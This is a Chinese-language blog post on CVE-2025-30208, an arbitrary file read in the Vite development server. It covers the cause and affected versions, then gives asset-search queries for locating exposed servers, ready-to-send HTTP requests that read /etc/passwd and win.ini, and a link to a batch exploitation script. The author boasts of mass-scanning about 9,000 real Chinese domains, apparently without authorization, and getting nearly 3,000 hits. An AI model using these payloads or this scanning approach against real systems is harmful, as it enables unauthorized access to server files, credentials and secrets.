前言

这个CVE-2025-30208资产真的巨多，而且出货量也高。

几天前的晚上，我就全部跑了一遍了，导出了12635条中国域名资产，总共大概跑了9000多条，出了大概快3000了，出货量很高，详情请看下文

漏洞信息

CVE-2025-30208是Vite开发服务器中存在的一个高危逻辑漏洞，允许攻击者通过构造特殊的URL绕过文件访问限制，读取服务器上的任意文件（如配置文件、密钥、数据库凭据等）。该漏洞的利用条件需满足两点：开发服务器通过--host或server.host配置暴露至网络（非默认配置），且使用受影响版本的Vite由于Vite广泛应用于Vue、React等主流前端框架，潜在影响范围涉及数十万级资产。

漏洞原理

漏洞源于Vite在处理URL查询参数时的逻辑缺陷。当请求路径包含特定参数（**如?raw??或?import&raw??**）时，Vite对URL尾部分隔符（如?和&）的正则匹配不严格，导致安全检查被绕过。例如，攻击者可构造类似/@fs/etc/passwd?raw??的请求，利用@fs机制（本用于访问项目允许列表内的文件）读取系统敏感文件官方修复方案通过正则表达式/[?&]+$/移除URL末尾的冗余分隔符，从而阻断绕过路径。

漏洞POC

漏洞特征

fofa&&quake

body="/@vite/client"

鹰图Hunter

web.body="/@vite/client"

影响范围

• 6.2.0 <= Vite <= 6.2.2
• 6.1.0 <= Vite <= 6.1.1
• 6.0.0 <= Vite <= 6.0.11
• 5.0.0 <= Vite <= 5.4.14
• Vite <= 4.5.9

POC

Linux下

GET /@fs/etc/passwd?import&raw?? HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive

window下

GET /@fs/C://windows/win.ini?import&raw?? HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive

注意再进行关键字搜索：以Linux举例

The server is configured with a public base URL of

有一些非常有好的提示，告诉我们路径错了，应该安装它这样注意在进行指定https搜索

plain HTTP request

总共大概跑了9000多条，出了大概快3000了，出货量很高，不过修的也是真的快，估计修了一半多了

批量检测脚本

项目地址

https://github.com/ThumpBo/CVE-2025-30208-EXP